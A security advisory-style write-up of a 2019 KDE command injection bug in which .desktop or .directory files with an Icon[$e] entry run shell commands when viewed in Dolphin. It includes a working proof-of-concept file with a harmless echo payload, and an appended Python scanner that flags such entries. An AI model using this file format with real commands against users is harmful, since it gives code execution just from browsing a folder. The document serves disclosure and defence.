printer exploitation
13th September 2019

KDE 4/5 KDesktopFile Command Injection


KDE 4 and KDE 5 (< 5.60.0) are affected by a command injection vulnerability in the KDesktopFile class.

When a .directory or .desktop file is instantiated, the value of its Icon entry is not evaluated safely, which an attacker can abuse to obtain command injection.

Simply downloading or viewing the malicious file in the default Dolphin file manager is enough for it to execute.

This is the functionality KDE uses to load the file's icon by default.

When we combine this feature with the way KDE handles .desktop and .directory files, we can force the file to evaluate some of the entries within the [Desktop Entry] tag. Some of the entries in this tag include "Icon", "Name", etc.

PROOF OF CONCEPT

You must have the KDE desktop environment running.

Create a file called .directory in any folder with the following content:

    [Desktop Entry]
    Type=Directory
    Icon[$e]=$(echo 0 > ~/Desktop/rce &)

Now, whenever the file is viewed in Dolphin, on the Desktop, or while browsing an SMB share, the command executes.

COMMAND BREAKDOWN

    Icon[$e]=$(echo 0 > ~/Desktop/rce &)

  • Icon[$e] : the Icon entry, with the [$e] marker that tells KDE to expand its value as an environment variable
  • echo 0 > ~/Desktop/rce & : creates a file on the Desktop named rce

REMEDIATION

Disable shell expansion / dynamic entries for [Desktop Entry] configurations.
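The following Python script is an added example, not code from the original post or from the KDE project. It covers both the command breakdown above and the remediation: it parses the INI-style [Desktop Entry] format, reports any key carrying the [$e] expansion marker (flagging those whose value contains a $( ) or backtick command substitution), and shows a remediated lookup that returns the Icon value verbatim instead of expanding it. The sample file contents are constructed inline so the script runs offline; the flag letters it recognises ($e for expansion, $i for immutable) are the ones documented for KConfig, and the file-scanning helper is an assumption about how a defender would apply it, not part of KDE.

```python
import re
import sys
from dataclasses import dataclass
from pathlib import Path

# Constructed sample: a .directory file of the shape shown in the post.
SAMPLE_DIRECTORY_FILE = """[Desktop Entry]
Type=Directory
Icon[$e]=$(echo 0 > ~/Desktop/rce &)
Name=Shared
"""

# Constructed benign sample: [$e] used only to expand an environment variable.
SAMPLE_BENIGN_FILE = """[Desktop Entry]
Type=Directory
Icon=folder-music
Name[$e]=$HOME
"""

# KConfig key syntax: Key, optional [locale], optional [$flags] where flags are
# e (expand) and/or i (immutable), e.g. Icon[$e], Name[de][$e], Path[$ie].
KEY_RE = re.compile(
    r"^(?P<key>[^=\[\]]+?)"
    r"(?:\[(?P<locale>[A-Za-z_@.]+)\])?"
    r"(?:\[\$(?P<flags>[ei]+)\])?"
    r"\s*=\s*(?P<value>.*)$"
)

# Value shapes that shell expansion turns into command execution.
SHELL_SUBST_RE = re.compile(r"\$\(|`")


@dataclass
class Finding:
    group: str
    key: str
    flags: str
    value: str
    command_substitution: bool  # True when the value contains $( ) or backticks


def parse_entries(text):
    """Yield (group, key, flags, value) for every key in an INI-style desktop file."""
    group = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
            continue
        m = KEY_RE.match(line)
        if m is None or group is None:
            continue
        yield group, m.group("key"), m.group("flags") or "", m.group("value")


def find_expandable_entries(text):
    """Return every entry whose key carries the $e (shell expansion) marker."""
    findings = []
    for group, key, flags, value in parse_entries(text):
        if "e" in flags:
            findings.append(
                Finding(group, key, flags, value, bool(SHELL_SUBST_RE.search(value)))
            )
    return findings


def read_icon_literal(text):
    """Remediated lookup: return the Icon value verbatim, never expanded, whatever its flags."""
    for group, key, flags, value in parse_entries(text):
        if group == "Desktop Entry" and key == "Icon":
            return value
    return None


def scan_directory(root):
    """Assumed defender workflow: scan a tree for .desktop/.directory files with $e entries."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.name == ".directory" or path.suffix == ".desktop":
            findings = find_expandable_entries(path.read_text(errors="replace"))
            if findings:
                results[str(path)] = findings
    return results


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, findings in scan_directory(sys.argv[1]).items():
            for f in findings:
                print(f"{path}: [{f.group}] {f.key}[${f.flags}] "
                      f"{'COMMAND SUBSTITUTION' if f.command_substitution else 'env expansion'}")
    else:
        for f in find_expandable_entries(SAMPLE_DIRECTORY_FILE):
            print(f"sample: {f.key}[${f.flags}]={f.value!r} command_substitution={f.command_substitution}")
        print("literal icon:", read_icon_literal(SAMPLE_DIRECTORY_FILE))
```

Run it with a directory argument to scan that tree, or with no arguments to check the inline samples. The benign sample shows why the scanner distinguishes plain variable expansion ($HOME) from command substitution: both are reported, but only the latter is marked as command execution, which is the condition the remediation removes by reading entries literally.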